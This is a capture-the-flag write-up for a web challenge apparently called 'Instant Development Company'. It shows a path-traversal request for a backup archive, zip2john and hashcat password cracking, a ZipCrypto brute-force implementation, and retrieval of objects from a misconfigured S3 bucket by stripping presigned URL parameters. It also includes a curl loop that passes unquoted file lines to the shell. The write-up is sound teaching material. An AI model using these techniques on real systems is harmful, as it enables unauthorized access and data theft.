Instant Development Company

Description

Your uncle got scammed but he’s too embarrassed to tell you how much he had lost. Can you find out?

https://instant-development-company.secchallenge.crysys.hu

  • Author: Andrix

Solution

Opening up the site we aren’t presented with too many options, so we head to the /review endpoint through the link on the main page. It’s vulnerable to XSS, but other than that I could not find anything interesting. I decided to go back to the roots and started running dirbuster against the site, which quickly found a hidden endpoint: /debug.

There we have a bunch of options, but downloading the source seems like a good place to start. After acquiring the source files we are presented with:

announce.html
base.html
debug.html
index.html
reviews.html

Reading through the files, we can see comments inside debug.html which indicate that a backup.zip file with an easy-to-break password is accessible from the webroot. The /download/templates endpoint does not sanitise the template name it is given, so a ../ prefix walks out of the templates directory and we can fetch the archive with a small Python script:

import requests

URL = "https://instant-development-company.secchallenge.crysys.hu/download/templates"

# The template name is not sanitised, so "../backup.zip" walks out of the
# templates directory. verify=False skips TLS checks; fine for a CTF target only.
r = requests.post(URL, data={"template": "../backup.zip"}, verify=False)
r.raise_for_status()
with open("backup.zip", "wb") as f:
    f.write(r.content)

From here we need to crack the archive’s password. First we extract the password hash with zip2john, then we let hashcat crack it:

zip2john backup.zip > backup.hash
# zip2john writes john's format: "backup.zip:$pkzip2$...$/pkzip2$::...".
# hashcat only accepts the part from $pkzip2$ to $/pkzip2$ (inclusive), so
# delete the filename prefix and the trailing fields or it will reject the line.

# -a 3: mask (brute-force) attack, -m 17220: PKZIP (Compressed Multi-File)
# The mask tries exactly ten digits; add -i (--increment) to also try
# shorter passwords.
hashcat -a 3 -m 17220 backup.hash ?d?d?d?d?d?d?d?d?d?d
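To see why a plain digit mask against a ZipCrypto archive is a realistic attack, here is an added example (not the author's code, and not a copy of what hashcat does internally): it implements the PKWARE traditional encryption key schedule from APPNOTE.TXT, builds the 12-byte encrypted header a zip tool prepends to every encrypted entry, and brute-forces digit passwords against the header's check byte. The password, CRC value and header bytes are constructed for the demo.

```python
"""ZipCrypto (PKWARE traditional encryption) check-byte brute force.

Added example, not the challenge author's code. Implements the key schedule
from PKWARE's APPNOTE.TXT (section 6.1) and attacks the 12-byte encrypted
header that precedes every encrypted entry. Password, CRC and header
material below are constructed for the demo.
"""
import itertools
import os
import zlib

MASK32 = 0xFFFFFFFF


def _crc32_byte(crc, byte):
    """One raw CRC-32 table step, crc = tab[(crc ^ byte) & 0xff] ^ (crc >> 8),
    expressed through zlib (which pre/post-inverts, hence the two XORs)."""
    return zlib.crc32(bytes([byte]), crc ^ MASK32) ^ MASK32


def update_keys(keys, byte):
    """Advance the three 32-bit keys by one plaintext byte (APPNOTE 6.1)."""
    keys[0] = _crc32_byte(keys[0], byte)
    keys[1] = ((keys[1] + (keys[0] & 0xFF)) * 134775813 + 1) & MASK32
    keys[2] = _crc32_byte(keys[2], keys[1] >> 24)


def init_keys(password):
    """Key state after feeding the password; this is all a candidate costs."""
    keys = [0x12345678, 0x23456789, 0x34567890]
    for c in password:
        update_keys(keys, c)
    return keys


def stream_byte(keys):
    """Next keystream byte derived from key 2."""
    temp = (keys[2] | 2) & 0xFFFF
    return ((temp * (temp ^ 1)) >> 8) & 0xFF


def make_header(password, crc, nonce=None):
    """Encrypted 12-byte header as a zip tool writes it: 11 random bytes and,
    as the 12th byte, the high byte of the entry's CRC-32 (the check byte)."""
    nonce = os.urandom(11) if nonce is None else nonce
    plain = nonce + bytes([(crc >> 24) & 0xFF])
    keys = init_keys(password)
    out = bytearray()
    for p in plain:
        out.append(p ^ stream_byte(keys))
        update_keys(keys, p)
    return bytes(out)


def check_password(candidate, header, crc):
    """Decrypt the header with the candidate and compare the check byte.
    One byte of check means a wrong password passes with probability 1/256."""
    keys = init_keys(candidate)
    last = 0
    for c in header:
        last = c ^ stream_byte(keys)
        update_keys(keys, last)
    return last == ((crc >> 24) & 0xFF)


def crack_digits(header, crc, max_len):
    """All digit-only passwords up to max_len that pass the check byte.
    The true password is among them, plus roughly 1/256 of all candidates."""
    hits = []
    for n in range(1, max_len + 1):
        for digits in itertools.product(b"0123456789", repeat=n):
            cand = bytes(digits)
            if check_password(cand, header, crc):
                hits.append(cand)
    return hits


if __name__ == "__main__":
    crc = 0xA1B2C3D4                      # constructed entry CRC-32
    hdr = make_header(b"4217", crc)       # constructed password
    hits = crack_digits(hdr, crc, 4)
    print(f"{len(hits)} candidates pass the check byte; b'4217' in hits: {b'4217' in hits}")
```

Run as is, it reports how many digit strings of up to four characters survive the check byte: around one in 256 wrong passwords does, which is why crackers additionally verify candidates against the entry data zip2john embeds in the hash rather than trusting the header alone. The other lesson is cost: each candidate is a handful of table lookups and multiplications with no salt and no stretching, so a ten-digit keyspace is well within reach of a GPU mask attack. (When an entry was written with the data-descriptor flag set, the check byte is the high byte of the modification time instead of the CRC; the attack is the same.)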

Once hashcat has crunched through all the possibilities, we can unzip the archive with the recovered password. It contains two files:

README.txt
contracts.txt

The README contains some sort of clue/meme, but contracts.txt is the file we are looking for. It contains a bunch of presigned S3 links, all of which had already expired.

At this point I got lucky and solved the challenge by accident using Python (I realized that if I use curl, the links remain accessible and I can read the contents, probably due to some AWS misconfiguration):

import os

# Each line of contracts.txt is a presigned S3 URL. Note that the URL is passed
# to the shell unquoted: the shell splits the command at every '&', so curl only
# receives the part of the URL before the first '&', i.e. without most of the
# presigned query parameters.
with open("contracts.txt", "r") as f:
    for line in f.readlines():
        os.system(f"curl {line}")

After the solve I contacted Andrix, who gave the explanation: if you forgo the parameters given to the HTTP request (the stuff after the ? in the URL), you can abuse the AWS S3 misconfiguration.
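To make the misconfiguration concrete, here is an added example (not the author's code): it parses presigned S3 URLs of the kind contracts.txt held, reports when each signature expired, strips the signing parameters and checks whether S3 still serves the object to an anonymous client. The bucket, key, access key id and signature values in the sample URLs are constructed placeholders, and the SigV2 case is included as a generalisation beyond the SigV4 links the challenge used.

```python
"""Check whether 'expired' presigned S3 URLs still work without their signature.

Added example, not the challenge author's code. The sample URLs below are
constructed: bucket, key, access key id and signature values are placeholders.
"""
import sys
import urllib.error
import urllib.request
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Constructed sample lines in the shape contracts.txt would contain:
# one SigV4 presigned URL and one older SigV2 (query-string auth) URL.
SIGV4_SAMPLE = (
    "https://example-bucket.s3.eu-central-1.amazonaws.com/contract-0001.pdf"
    "?X-Amz-Algorithm=AWS4-HMAC-SHA256"
    "&X-Amz-Credential=AKIAEXAMPLE%2F20220301%2Feu-central-1%2Fs3%2Faws4_request"
    "&X-Amz-Date=20220301T120000Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host"
    "&X-Amz-Signature=" + "0" * 64
)
SIGV2_SAMPLE = (
    "https://example-bucket.s3.amazonaws.com/contract-0002.pdf"
    "?AWSAccessKeyId=AKIAEXAMPLE&Expires=1646136000&Signature=c2lnbmF0dXJl%3D"
)


def presign_expiry(url):
    """UTC time at which the presigned URL's signature stops validating,
    or None if the URL carries no recognisable query-string signature."""
    q = parse_qs(urlsplit(url).query)
    if "X-Amz-Date" in q and "X-Amz-Expires" in q:          # SigV4
        start = datetime.strptime(q["X-Amz-Date"][0], "%Y%m%dT%H%M%SZ")
        start = start.replace(tzinfo=timezone.utc)
        return start + timedelta(seconds=int(q["X-Amz-Expires"][0]))
    if "Expires" in q and "Signature" in q:                  # SigV2
        return datetime.fromtimestamp(int(q["Expires"][0]), tz=timezone.utc)
    return None


def is_expired(url, now=None):
    """True if the URL is presigned and its validity window has passed."""
    expiry = presign_expiry(url)
    if expiry is None:
        return False
    return (now or datetime.now(timezone.utc)) >= expiry


def strip_presign(url):
    """Drop the whole query string (and fragment): what is left is a plain,
    unauthenticated GET of the object. S3 then sees no signature to reject as
    expired and evaluates the request against the bucket/object ACL or policy."""
    parts = urlsplit(url)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))


def check_anonymous(url, timeout=10):
    """Fetch the stripped URL. True means S3 served the object to an
    anonymous client, i.e. it is publicly readable and the expiry on the
    presigned link was never a real access control."""
    try:
        with urllib.request.urlopen(strip_presign(url), timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:        # 403 AccessDenied, 404 NoSuchKey, ...
        return False


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "contracts.txt"
    with open(path) as f:
        urls = [line.strip() for line in f if line.strip()]
    for u in urls:
        state = "expired" if is_expired(u) else "valid/unsigned"
        public = check_anonymous(u)
        print(f"{state:15} anonymous={public!s:5} {strip_presign(u)}")
```

The point of the script is the contrast it prints: a link whose signature expired long ago still returns 200 once the query string is gone, because the expiry only governs the signature, not the object. The fix on the bucket side is to deny anonymous s3:GetObject (block public access, no public-read ACLs, no wildcard principal in the bucket policy), at which point the stripped URL gets 403 and presigning becomes the only way in.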

The acquired flag is:

cd22{HIDDEN}
